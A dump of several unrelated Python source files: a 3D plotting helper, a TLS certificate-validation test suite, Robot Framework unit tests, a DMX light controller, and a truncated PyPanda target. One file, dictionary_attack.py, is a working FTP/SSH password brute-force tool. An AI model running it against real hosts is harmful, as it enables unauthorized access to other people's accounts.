self.title = title
self.data = None
self.got_data = False
self.axis_computed = False
self.xlim = [float("inf"),float("-inf")]
self.ylim = [float("inf"),float("-inf")]
self.zlim = [float("inf"),float("-inf")]
self.handle_map = {}
self.key = Value('i',0)
self.is_running = Value('i',1)
self.queue = Queue()
self.vp = Process(target=self.drawer_thread, args=(self.queue,mp_lock, self.key, self.is_running,))
self.vp.daemon = kSetDaemon
self.vp.start()
def quit(self):
self.is_running.value = 0
self.vp.join(timeout=5)
def drawer_thread(self, queue, lock, key, is_running):
self.init(lock)
while is_running.value == 1:
self.drawer_refresh(queue, lock)
if kUseFigCanvasDrawIdle:
time.sleep(kPlotSleep)
print(mp.current_process().name,'closing fig ', self.fig)
plt.close(self.fig)
def drawer_refresh(self, queue, lock):
while not queue.empty():
self.got_data = True
self.data = queue.get()
traj, name, color, marker = self.data
np_traj = np.asarray(traj)
if name in self.handle_map:
handle = self.handle_map[name]
self.ax.collections.remove(handle)
self.updateMinMax(np_traj)
handle = self.ax.scatter3D(np_traj[:, 0], np_traj[:, 1], np_traj[:, 2], c=color, marker=marker)
handle.set_label(name)
self.handle_map[name] = handle
if self.got_data is True:
self.plot_refresh(lock)
def on_key_press(self, event):
#print(mp.current_process().name,"key event pressed...", self._key)
self.key.value = ord(event.key) # conver to int
def on_key_release(self, event):
#print(mp.current_process().name,"key event released...", self._key)
self.key.value = 0 # reset to no key symbol
def get_key(self):
return chr(self.key.value)
def init(self, lock):
lock.acquire()
if kVerbose:
print(mp.current_process().name,"initializing...")
self.fig = plt.figure()
if kUseFigCanvasDrawIdle:
self.fig.canvas.draw_idle()
self.fig.canvas.mpl_connect('key_press_event', self.on_key_press)
self.fig.canvas.mpl_connect('key_release_event', self.on_key_release)
self.ax = self.fig.gca(projection='3d')
if self.title is not '':
self.ax.set_title(self.title)
self.ax.set_xlabel('X axis')
self.ax.set_ylabel('Y axis')
self.ax.set_zlabel('Z axis')
self.setAxis()
lock.release()
def setAxis(self):
#self.ax.axis('equal') # this does not work with the new matplotlib 3
if self.axis_computed:
self.ax.set_xlim(self.xlim)
self.ax.set_ylim(self.ylim)
self.ax.set_zlim(self.zlim)
self.ax.legend()
#We need to draw *and* flush
if not kUseFigCanvasDrawIdle:
self.fig.canvas.draw()
self.fig.canvas.flush_events()
def drawTraj(self, traj, name, color='r', marker='.'):
if self.queue is None:
return
self.queue.put((traj, name, color, marker))
def updateMinMax(self, np_traj):
xmax,ymax,zmax = np.amax(np_traj,axis=0)
xmin,ymin,zmin = np.amin(np_traj,axis=0)
cx = 0.5*(xmax+xmin)
cy = 0.5*(ymax+ymin)
cz = 0.5*(zmax+zmin)
if False:
# update maxs
if xmax > self.xlim[1]:
self.xlim[1] = xmax
if ymax > self.ylim[1]:
self.ylim[1] = ymax
if zmax > self.zlim[1]:
self.zlim[1] = zmax
# update mins
if xmin < self.xlim[0]:
self.xlim[0] = xmin
if ymin < self.ylim[0]:
self.ylim[0] = ymin
if zmin < self.zlim[0]:
self.zlim[0] = zmin
# make axis actually squared
if True:
#smin = min(self.xlim[0],self.ylim[0],self.zlim[0])
#smax = max(self.xlim[1],self.ylim[1],self.zlim[1])
smin = min(xmin,ymin,zmin)
smax = max(xmax,ymax,zmax)
delta = 0.5*(smax - smin)
self.xlim = [cx-delta,cx+delta]
self.ylim = [cy-delta,cy+delta]
self.zlim = [cz-delta,cz+delta]
self.axis_computed = True
def plot_refresh(self, lock):
if kVerbose:
print(mp.current_process().name,"refreshing ", self.title)
lock.acquire()
self.setAxis()
if not kUseFigCanvasDrawIdle:
plt.pause(kPlotSleep)
lock.release()
# fake
def refresh(self):
pass
|
https.py | from __future__ import absolute_import, unicode_literals
import ssl
import sys
import socket
import threading
import contextlib
try:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from http.server import HTTPServer, BaseHTTPRequestHandler
from .. import results
from ..utils import tmpfiles
from ..gencert import gencert
from ..testenv import testenv, testgroup, Test
BADTLS_CA_DATA = b"""
-----BEGIN CERTIFICATE-----
MIIDlTCCAn+gAwIBAgIIVvpPzLyqk+0wCwYJKoZIhvcNAQELMGoxaDAJBgNVBAYT
AlVTMBQGA1UECAwNTWFzc2FjaHVzZXR0czAOBgNVBAcMB05ld2J1cnkwFgYDVQQK
DA9CYWQgVExTIExpbWl0ZWQwHQYDVQQDDBZCYWQgVExTIExpbWl0ZWQgUlNBIENB
MB4XDTE2MDEwMTAwMDAwMFoXDTI2MDEwMTAwMDAwMFowajFoMAkGA1UEBhMCVVMw
FAYDVQQIDA1NYXNzYWNodXNldHRzMA4GA1UEBwwHTmV3YnVyeTAWBgNVBAoMD0Jh
ZCBUTFMgTGltaXRlZDAdBgNVBAMMFkJhZCBUTFMgTGltaXRlZCBSU0EgQ0EwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDSHu3OR1RS0D2xLKGK2Ts5eLoO
/P+IXst5WPdaD9UwGI8edfAy3U8wcMFDoXNhBQM+ZW69Z5uOZVxs704+j5cgCEAT
LbtyIrF2X8BixXFzrJFd+kpojURheyxML20GbZsznJgKzYvGqFqWa/1lYwy/v0SP
RNGPEkjFXb/tItDwrDxcuDzY6zjNlW5MwqvS11P1H8eg0idUrANY2MzT8+oyH3Sn
JLCsmulnmj1b6IZZDN4i8rKXEbH14jIsANHIgTqvS+kJf3Z1PqHAOUqVGlO3SDZd
KIqZ8olS6ty9/pco6cxvX2Te9m1z5f1fSrdxAtx7lHM3pdvs9DhML+8FAewDAgMB
AAGjQzBBMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFGEbxkZbhgwiZRAMx7Vs
VCRXl/tkMA8GA1UdDwEB/wQFAwMHBgAwCwYJKoZIhvcNAQELA4IBAQBKv0TJoRhd
wg7dPOFDVuKaLtuVzXEeUWfsA86iW4wjXFO/npI+1exSBX92MhsWk5Gjn9dO/Hq4
EZ1pMJ8hFdrOXoEHlvhnZSavtoy25ZvEoxJ9XWYPqWCmwdfB3xhT4hoEaIlu5Azf
Fw/QV5oFV8SYgwClQ+fTStxdW7CBKEX55KPUn4FOOXV5TfbLOJj3w/1V2pBTKn2f
2safgWyIpNw7OyvYVICdW5/NvD+VTBp+4PfWkTfRD5LEAxqvaGXupBaI2qGYVibJ
WQ77yy6bOvcJh4heqtIJuYg5F3vhvSGo4i5Bkx+daRKFzFwsoiexgRNTdlPCEGsQ
15WBlk3X/9bt
-----END CERTIFICATE-----
"""
@testenv
def badtls(accept, host, port, description):
with tmpfiles(BADTLS_CA_DATA) as cafile:
yield Test(
accept=accept,
description=description,
host=host,
port=port,
cafile=cafile
)
@testenv
def badssl(accept, name, description, forced_result=None):
yield Test(
accept=accept,
description=description,
host=name + ".badssl.com",
port=443,
forced_result=forced_result
)
@testenv
def badssl_onlymyca(description):
_, _, cadata = gencert("localhost")
with tmpfiles(cadata) as cafile:
yield Test(
accept=False,
description=description,
host="sha256.badssl.com",
port=443,
cafile=cafile
)
@testenv
def ssllabs(accept, port, description):
yield Test(
accept=accept,
description=description,
host="www.ssllabs.com",
port=port
)
@contextlib.contextmanager
def http_server(ssl_context, host="localhost", port=0):
class Timeout(Exception):
pass
class Server(HTTPServer):
ALLOWED_EXCEPTIONS = (socket.error,)
def handle_timeout(self):
raise Timeout()
def handle_error(self, request, client_address):
exc_type, _, _ = sys.exc_info()
if isinstance(exc_type, type) and issubclass(exc_type, self.ALLOWED_EXCEPTIONS):
return
HTTPServer.handle_error(self, request, client_address)
class Handler(BaseHTTPRequestHandler):
def setup(self):
self.request = ssl_context.wrap_socket(self.request, server_side=True)
return BaseHTTPRequestHandler.setup(self)
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "0")
self.end_headers()
def log_message(self, format, *args):
pass
def serve(server, done):
while not done.is_set():
try:
server.handle_request()
except Timeout:
continue
break
server = Server((host, port), Handler)
try:
server.timeout = 0.1
done = threading.Event()
thread = threading.Thread(target=serve, args=[server, done])
thread.start()
try:
yield host, server.server_port
finally:
done.set()
thread.join()
finally:
server.server_close()
@testenv
def local(accept, cn, description):
certdata, keydata, cadata = gencert(cn)
with tmpfiles(certdata, keydata, cadata) as (certfile, keyfile, cafile):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(certfile, keyfile)
with http_server(context) as (host, port):
yield Test(
accept=accept,
description=description,
host=host,
port=port,
cafile=cafile,
name="{}:<temp port>".format(host)
)
@testgroup
def badssl_tests():
forced_result = None
res = yield Test(
accept=True,
description="support for TLS server name indication (SNI)",
host="badssl.com",
port=443
)
if res.type != results.Pass:
forced_result = results.Skip("could not detect SNI support")
res = yield Test(
accept=False,
description="self-signed certificate",
host="self-signed.badssl.com",
port=443,
forced_result=forced_result
)
if res.type != results.Pass and not forced_result:
forced_result = results.Skip("stub didn't reject a self-signed certificate")
yield testgroup(
badssl(False, "expired", "expired certificate", forced_result),
badssl(False, "wrong.host", "wrong hostname in certificate", forced_result),
badssl(True, "sha256", "SHA-256 signature algorithm", forced_result),
badssl(True, "1000-sans", "certificate with 1000 different Subject Alternative Names", forced_result),
badssl(False, "incomplete-chain", "incomplete chain of trust", forced_result),
badssl(False, "superfish", "Superfish CA", forced_result),
badssl(False, "edellroot", "eDellRoot CA", forced_result),
badssl(False, "dsdtestprovider", "DSDTestProvider CA", forced_result),
badssl(False, "untrusted-root", "untrusted root certificate", forced_result),
badssl(False, "rc4", "denies use of RC4 ciphers (RFC 7465)", forced_result),
badssl(False, "rc4-md5", "denies use of RC4 with MD5 ciphers", forced_result),
badssl(False, "null", "denies use of null cipher", forced_result),
badssl(False, "dh480", "denies use of 480 bit Diffie-Hellman (DH)", forced_result),
badssl(False, "dh512", "denies use of 512 bit Diffie-Hellman (DH)", forced_result)
)
ssllabs_tests = testgroup(
ssllabs(False, 10443, "protect against Apple's TLS vulnerability CVE-2014-1266"),
ssllabs(False, 10444, "protect against the FREAK attack"),
ssllabs(False, 10445, "protect against the Logjam attack")
)
badtls_tests = testgroup(
badtls(True, "domain-match.badtls.io", 10000, "valid certificate Common Name"),
badtls(True, "wildcard-match.badtls.io", 10001, "valid wildcard certificate Common Name"),
badtls(True, "san-match.badtls.io", 10002, "support for Subject Alternative Name (SAN)"),
badtls(True, "dh1024.badtls.io", 10005, "TLS handshake with 1024 bit Diffie-Hellman (DH)"),
badtls(False, "expired-1963.badtls.io", 11000, "certificate expired in year 1963"),
badtls(False, "future.badtls.io", 11001, "certificate validity starts in future"),
badtls(False, "domain-mismatch.badtls.io", 11002, "mismatch in certificate's Common Name"),
badtls(False, "san-mismatch.badtls.io", 11003, "Subject Alternative Name (SAN) mismatch"),
badtls(False, "bad-key-usage.badtls.io", 11005, "certificate has invalid key usage for HTTPS connection"),
badtls(False, "expired.badtls.io", 11006, "expired certificate"),
badtls(False, "wildcard.mismatch.badtls.io", 11007, "invalid wildcard certificate Common Name"),
badtls(False, "rc4.badtls.io", 11008, "denies use of RC4 ciphers (RFC 7465)"),
badtls(False, "weak-sig.badtls.io", 11004, "denies use of MD5 signature algorithm (RFC 6151)"),
badtls(False, "rc4-md5.badtls.io", 11009, "denies use of RC4 with MD5 ciphers")
)
local_tests = testgroup(
local(True, "localhost", "valid localhost certificate"),
local(False, "nothing", "invalid localhost certificate"),
badssl_onlymyca("use only the given CA bundle, not system's")
)
all_tests = testgroup(
ssllabs_tests,
badssl_tests,
badtls_tests,
local_tests
)
|
test_run_and_rebot.py | import unittest
import time
import glob
import sys
import threading
import tempfile
import signal
import logging
from io import StringIO
from os.path import abspath, curdir, dirname, exists, join
from os import chdir, getenv
from robot import run, run_cli, rebot, rebot_cli
from robot.model import SuiteVisitor
from robot.running import namespace
from robot.utils.asserts import assert_equal, assert_raises, assert_true
from resources.runningtestcase import RunningTestCase
from resources.Listener import Listener
ROOT = dirname(dirname(dirname(abspath(__file__))))
TEMP = getenv('TEMPDIR', tempfile.gettempdir())
OUTPUT_PATH = join(TEMP, 'output.xml')
REPORT_PATH = join(TEMP, 'report.html')
LOG_PATH = join(TEMP, 'log.html')
LOG = 'Log: %s' % LOG_PATH
def run_without_outputs(*args, **kwargs):
options = {'output': 'NONE', 'log': 'NoNe', 'report': None}
options.update(kwargs)
return run(*args, **options)
def assert_signal_handler_equal(signum, expected):
sig = signal.getsignal(signum)
assert_equal(sig, expected)
class StreamWithOnlyWriteAndFlush:
def __init__(self):
self._buffer = []
def write(self, msg):
self._buffer.append(msg)
def flush(self):
pass
def getvalue(self):
return ''.join(self._buffer)
class TestRun(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
warn = join(ROOT, 'atest', 'testdata', 'misc', 'warnings_and_errors.robot')
nonex = join(TEMP, 'non-existing-file-this-is.robot')
remove_files = [LOG_PATH, REPORT_PATH, OUTPUT_PATH]
def test_run_once(self):
assert_equal(run(self.data, outputdir=TEMP, report='none'), 1)
self._assert_outputs([('Pass And Fail', 2), (LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(run_without_outputs(self.data), 1)
assert_equal(run_without_outputs(self.data, name='New Name'), 1)
self._assert_outputs([('Pass And Fail', 2), ('New Name', 2), (LOG, 0)])
def test_run_fail(self):
assert_equal(run(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[('Pass And Fail', 2), (LOG, 1)])
def test_run_error(self):
assert_equal(run(self.nonex), 252)
self._assert_outputs(stderr=[('[ ERROR ]', 1), (self.nonex, 1),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(run_without_outputs(self.data, stdout=stdout), 1)
self._assert_output(stdout, [('Pass And Fail', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_custom_stderr(self):
stderr = StringIO()
assert_equal(run_without_outputs(self.warn, stderr=stderr), 0)
self._assert_output(stderr, [('[ WARN ]', 4), ('[ ERROR ]', 2)])
self._assert_outputs([('Warnings And Errors', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(run_without_outputs(self.warn, stdout=output, stderr=output), 0)
self._assert_output(output, [('[ WARN ]', 4), ('[ ERROR ]', 2),
('Warnings And Errors', 3), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_multi_options_as_single_string(self):
assert_equal(run_without_outputs(self.data, include='?a??', skip='pass',
skiponfailure='fail'), 0)
self._assert_outputs([('2 tests, 0 passed, 0 failed, 2 skipped', 1)])
def test_multi_options_as_tuples(self):
assert_equal(run_without_outputs(self.data, exclude=('fail',), skip=('pass',),
skiponfailure=('xxx', 'yyy')), 0)
self._assert_outputs([('FAIL', 0)])
self._assert_outputs([('1 test, 0 passed, 0 failed, 1 skipped', 1)])
def test_listener_gets_notification_about_log_report_and_output(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run(self.data, output=OUTPUT_PATH, report=REPORT_PATH,
log=LOG_PATH, listener=listener), 1)
self._assert_outputs(stdout=[('[output {0}]'.format(OUTPUT_PATH), 1),
('[report {0}]'.format(REPORT_PATH), 1),
('[log {0}]'.format(LOG_PATH), 1),
('[listener close]', 1)])
def test_pass_listener_as_instance(self):
assert_equal(run_without_outputs(self.data, listener=Listener(1)), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_string(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=module_file+":1"), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_list(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=[module_file+":1", Listener(2)]), 1)
self._assert_outputs([("[from listener 1]", 1), ("[from listener 2]", 1)])
def test_pre_run_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def start_suite(self, suite):
suite.tests = [t for t in suite.tests if t.tags.match('pass')]
assert_equal(run_without_outputs(self.data, prerunmodifier=Modifier()), 0)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 0)])
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
modifier = Modifier()
assert_equal(run(self.data, outputdir=TEMP, log=LOG_PATH, prerebotmodifier=modifier), 1)
assert_equal(modifier.tests, ['Pass', 'Fail'])
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)])
def test_invalid_modifier(self):
assert_equal(run_without_outputs(self.data, prerunmodifier=42), 1)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)],
[("[ ERROR ] Executing model modifier 'integer' "
"failed: AttributeError: ", 1)])
def test_run_cli_system_exits_by_default(self):
exit = assert_raises(SystemExit, run_cli, ['-d', TEMP, self.data])
assert_equal(exit.code, 1)
def test_run_cli_optionally_returns_rc(self):
rc = run_cli(['-d', TEMP, self.data], exit=False)
assert_equal(rc, 1)
class TestRebot(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'rebot', 'created_normal.xml')
nonex = join(TEMP, 'non-existing-file-this-is.xml')
remove_files = [LOG_PATH, REPORT_PATH]
def test_run_once(self):
assert_equal(rebot(self.data, outputdir=TEMP, report='NONE'), 1)
self._assert_outputs([(LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(rebot(self.data, outputdir=TEMP), 1)
assert_equal(rebot(self.data, outputdir=TEMP, name='New Name'), 1)
self._assert_outputs([(LOG, 2)])
def test_run_fails(self):
assert_equal(rebot(self.nonex), 252)
assert_equal(rebot(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[(LOG, 1)],
stderr=[('[ ERROR ]', 1), (self.nonex, (1, 2)),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(rebot(self.data, report='None', stdout=stdout,
outputdir=TEMP), 1)
self._assert_output(stdout, [('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(rebot(self.data, log='NONE', report='NONE', stdout=output,
stderr=output), 252)
assert_equal(rebot(self.data, report='NONE', stdout=output,
stderr=output, outputdir=TEMP), 1)
self._assert_output(output, [('[ ERROR ] No outputs created', 1),
('--help', 1), ('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
test.status = 'FAIL'
modifier = Modifier()
assert_equal(rebot(self.data, outputdir=TEMP,
prerebotmodifier=modifier), 3)
assert_equal(modifier.tests, ['Test 1.1', 'Test 1.2', 'Test 2.1'])
def test_rebot_cli_system_exits_by_default(self):
exit = assert_raises(SystemExit, rebot_cli, ['-d', TEMP, self.data])
assert_equal(exit.code, 1)
def test_rebot_cli_optionally_returns_rc(self):
rc = rebot_cli(['-d', TEMP, self.data], exit=False)
assert_equal(rc, 1)
class TestStateBetweenTestRuns(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot')
def test_importer_caches_are_cleared_between_runs(self):
self._run(self.data)
lib = self._import_library()
res = self._import_resource()
self._run(self.data)
assert_true(lib is not self._import_library())
assert_true(res is not self._import_resource())
def _run(self, data, rc=None, **config):
self._clear_outputs()
returned_rc = run_without_outputs(data, outputdir=TEMP, **config)
if rc is not None:
assert_equal(returned_rc, rc)
def _import_library(self):
return namespace.IMPORTER.import_library('BuiltIn', None, None, None)
def _import_resource(self):
resource = join(ROOT, 'atest', 'testdata', 'core', 'resources.robot')
return namespace.IMPORTER.import_resource(resource)
def test_clear_namespace_between_runs(self):
data = join(ROOT, 'atest', 'testdata', 'variables', 'commandline_variables.robot')
self._run(data, test=['NormalText'], variable=['NormalText:Hello'], rc=0)
self._run(data, test=['NormalText'], rc=1)
def test_reset_logging_conf(self):
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
self._run(join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot'))
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
def test_listener_unregistration(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
self._run(self.data, listener=listener+':1', rc=0)
self._assert_outputs([("[from listener 1]", 1), ("[listener close]", 1)])
self._run(self.data, rc=0)
self._assert_outputs([("[from listener 1]", 0), ("[listener close]", 0)])
def test_rerunfailed_is_not_persistent(self):
# https://github.com/robotframework/robotframework/issues/2437
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
self._run(data, output=OUTPUT_PATH, rc=1)
self._run(data, rerunfailed=OUTPUT_PATH, rc=1)
self._run(self.data, output=OUTPUT_PATH, rc=0)
assert_equal(rebot(OUTPUT_PATH, log=LOG_PATH, report=None), 0)
class TestTimestampOutputs(RunningTestCase):
output = join(TEMP, 'output-ts-*.xml')
report = join(TEMP, 'report-ts-*.html')
log = join(TEMP, 'log-ts-*.html')
remove_files = [output, report, log]
def test_different_timestamps_when_run_multiple_times(self):
self.run_tests()
output1, = self.find_results(self.output, 1)
report1, = self.find_results(self.report, 1)
log1, = self.find_results(self.log, 1)
self.wait_until_next_second()
self.run_tests()
output21, output22 = self.find_results(self.output, 2)
report21, report22 = self.find_results(self.report, 2)
log21, log22 = self.find_results(self.log, 2)
assert_equal(output1, output21)
assert_equal(report1, report21)
assert_equal(log1, log21)
def run_tests(self):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
assert_equal(run(data, timestampoutputs=True, outputdir=TEMP,
output='output-ts.xml', report='report-ts.html',
log='log-ts'), 1)
def find_results(self, pattern, expected):
matches = glob.glob(pattern)
assert_equal(len(matches), expected)
return sorted(matches)
def wait_until_next_second(self):
start = time.localtime()[5]
while time.localtime()[5] == start:
time.sleep(0.01)
class TestSignalHandlers(unittest.TestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
def test_original_signal_handlers_are_restored(self):
orig_sigint = signal.getsignal(signal.SIGINT)
orig_sigterm = signal.getsignal(signal.SIGTERM)
my_sigterm = lambda signum, frame: None
signal.signal(signal.SIGTERM, my_sigterm)
try:
run_without_outputs(self.data, stdout=StringIO())
assert_signal_handler_equal(signal.SIGINT, orig_sigint)
assert_signal_handler_equal(signal.SIGTERM, my_sigterm)
finally:
signal.signal(signal.SIGINT, orig_sigint)
signal.signal(signal.SIGTERM, orig_sigterm)
def test_dont_register_signal_handlers_when_run_on_thread(self):
stream = StringIO()
thread = threading.Thread(target=run_without_outputs, args=(self.data,),
kwargs=dict(stdout=stream, stderr=stream))
thread.start()
thread.join()
output = stream.getvalue()
assert_true('ERROR' not in output.upper(), 'Errors:\n%s' % output)
class TestRelativeImportsFromPythonpath(RunningTestCase):
data = join(abspath(dirname(__file__)), 'import_test.robot')
def setUp(self):
self._orig_path = abspath(curdir)
chdir(ROOT)
sys.path.append(join('atest', 'testresources'))
def tearDown(self):
chdir(self._orig_path)
sys.path.pop()
def test_importing_library_from_pythonpath(self):
errors = StringIO()
run(self.data, outputdir=TEMP, stdout=StringIO(), stderr=errors)
self._assert_output(errors, '')
if __name__ == '__main__':
unittest.main()
|
dictionary_attack.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import paramiko # external package
import ftplib
import threading
import queue
import socket
from ftplib import FTP
from common_utils import menu_utils
from common_utils import file_utils
import config_params
from os import listdir
from os.path import isfile, join
import time
""" This module uses dictionaries to perform brute force attacks """
def load_dictionaries_list():
"""loading the list of credentials dictionaries"""
dictionaries_list = [f for f in listdir(config_params.CREDENTIALS_DICTIONARIES_FOLDER)
if (isfile(join(config_params.CREDENTIALS_DICTIONARIES_FOLDER, f)) and f.lower().endswith('.dic'))]
return dictionaries_list
def _ftp_connection_attempt(ip, port, user, passw, my_queue):
try:
ftp = FTP(ip, timeout=config_params.FTP_SERVER_TIMEOUT)
ftp.login(user, passw)
my_queue.put(passw)
except ftplib.error_perm:
return
except OSError as e:
menu_utils.error(e)
def _ssh_connection_attempt(ip, port, user, passw, my_queue):
conn_ssh = paramiko.SSHClient()
conn_ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
conn_ssh.connect(ip, port, user, passw)
my_queue.put(passw)
except paramiko.AuthenticationException:
return
except (socket.error, socket.timeout, paramiko.ssh_exception.SSHException) as e:
menu_utils.error(e)
def dictionary_attack(protocol, ip, port, interval, user, dictionary):
if (protocol.lower() != 'ftp') & (protocol.lower() != 'ssh'):
menu_utils.warning('Only "FTP" or "SSH" protocols are supported')
return
menu_utils.header('Brute force attack, target IP: %s ' % ip)
menu_utils.mixed_info("Protocol:", protocol)
menu_utils.mixed_info("Interval between attempts:", "%s milliseconds" % interval)
menu_utils.mixed_info("User:", user)
menu_utils.mixed_info("Dictionary:", dictionary)
counter = 0
thread_list = []
passwords = file_utils.load_file_as_list(dictionary)
print("%s passwords in the dictionary" % len(passwords))
menu_utils.highlighted_info("Progress:\n")
my_queue = queue.Queue()
if passwords:
for passw in passwords:
time.sleep(interval/1000)
counter += 1
additional_info = "Trying pass: %s" % passw
menu_utils.progress_bar(int(100*counter/len(passwords)),
config_params.DISPLAY["progress_bar_width"], additional_info)
if protocol.lower() == 'ftp':
t = threading.Thread(target=_ftp_connection_attempt, args=(ip, port, user, passw, my_queue, ))
elif protocol.lower() == 'ssh':
t = threading.Thread(target=_ssh_connection_attempt, args=(ip, port, user, passw, my_queue,))
t.start()
thread_list.append(t)
if counter % config_params.MAX_NUMBER_THREADS == 0:
for thread in thread_list:
thread.join() # closing threads
thread_list = []
if not my_queue.empty(): # the pass is stored in the queue
break
for thread in thread_list:
thread.join() # closing threads
if not my_queue.empty(): # the pass is stored in the queue
menu_utils.super_highlighted_info("\n[+] Password found: %s" % my_queue.get())
else:
menu_utils.warning("\n[-] Password not found in %s " % dictionary)
else:
menu_utils.warning("\n[-] %s dictionary not found " % dictionary)
|
spider_3x3.py | """The 3x3 spider light on the cieling
https://www.amazon.com/gp/product/B07XRDB4QT/ref=ppx_yo_dt_b_search_asin_title?ie=UTF8&psc=1
"""
import logging
import multiprocessing as mp
import time
import numpy as np # type: ignore
import music_visualization_system as mvs
import pymvf
LOGGER = logging.getLogger(__name__)
class Spider3X3:
def __init__(self, delay: float):
self._dmx_device = mvs.dmx.ESPDMX("espdmx1.caverage.lan", 80)
self._delay = delay
self.disable()
self._process_queue = mp.Queue()
self._drive_queue = mp.Queue()
self._process_process = pymvf.Process(target=self._process)
self._process_process.start()
self._drive_process = pymvf.Process(target=self._drive)
self._drive_process.start()
def enable(self) -> None:
dmx_channels = bytearray()
for _ in range(1, 9 + 1):
dmx_channels.append(0)
dmx_channels.append(220) # AUTO effect
for _ in range(11, 12 + 1):
dmx_channels.append(0)
try:
self._dmx_device(dmx_channels)
LOGGER.info("enabled")
except OSError:
LOGGER.critical("cannot reach Spider3X3 DMX controller")
def disable(self) -> None:
dmx_channels = bytearray()
for _ in range(1, 12):
dmx_channels.append(0)
try:
self._dmx_device(dmx_channels)
LOGGER.info("disabled")
except OSError:
LOGGER.critical("cannot reach Spider3X3 DMX controller")
def _process(self) -> None:
""" Process incoming data into directions for the `_drive` process"""
buffers_of_delay = mvs.BUFFERS_PER_SECOND * self._delay
look_ahead_list = []
disable_time = None
while True:
look_ahead_list.append(self._process_queue.get())
# wait until we have enough values for the calculations
# nothing is discarded here, so no issues with timing or sync
if not len(look_ahead_list) > buffers_of_delay / 2:
continue
timestamp, _ = look_ahead_list.pop(0)
# every intensity for DELAY seconds worth of buffers, approx
delayed_intensities = np.array(look_ahead_list)[:, 1]
if disable_time is None:
disable_time = timestamp
if np.average(delayed_intensities) > 0.3:
period = len(delayed_intensities) * mvs.TIME_PER_BUFFER
if timestamp + period > disable_time:
# LOGGER.info(">0.3")
disable_time = timestamp + period
elif (
np.average(delayed_intensities[: int(len(delayed_intensities) / 2)])
> 0.4
):
period = (len(delayed_intensities) / 2) * mvs.TIME_PER_BUFFER
if timestamp + period > disable_time:
LOGGER.info(">0.4")
disable_time = timestamp + period
elif (
np.average(delayed_intensities[: int(len(delayed_intensities) / 4)])
> 0.6
):
period = (len(delayed_intensities) / 4) * mvs.TIME_PER_BUFFER
if timestamp + period > disable_time:
LOGGER.info(">0.6")
disable_time = timestamp + period
enabled = bool(timestamp < disable_time)
# LOGGER.info(disable_time - timestamp)
# LOGGER.info(enabled)
self._drive_queue.put((timestamp, enabled))
def _drive(self) -> None:
""" Drive the DMX device"""
next_frame_time = None
current_status = False
while True:
timestamp, enabled = self._drive_queue.get()
if next_frame_time is None:
next_frame_time = timestamp + self._delay
# if current_status == enabled:
# # leave it be if it's the same
# next_frame_time += mvs.TIME_PER_BUFFER
# continue
while time.perf_counter() < next_frame_time:
# wait for next frame time
pass
if enabled:
self.enable()
else:
self.disable()
current_status = enabled
next_frame_time += mvs.TIME_PER_BUFFER
def __call__(self, timestamp: float, mono_intensity: float) -> None:
""" Add an intensity to the queue for processing.
Args:
timestamp: the timestamp of the buffer that the intensity came from.
mono_intensity: the intensity of the mono channel for the given timestamp.
"""
assert mono_intensity <= 1
self._process_queue.put((timestamp, mono_intensity))
|
pypanda_target.py | from threading import Thread
from time import sleep
from os.path import abspath
from avatar2.targets import PandaTarget
from ..watchmen import watch
from .target import action_valid_decorator_factory, TargetStates
class PyPandaTarget(PandaTarget):
'''
The pypanda target is a PANDA target, but uses pypanda to run the framework.
'''
def __init__(self, *args, **kwargs):
try:
import pandare
except ImportError:
raise RuntimeError(("PyPanda could not be found! for installation, "
"please follow the steps at https://github.com/"
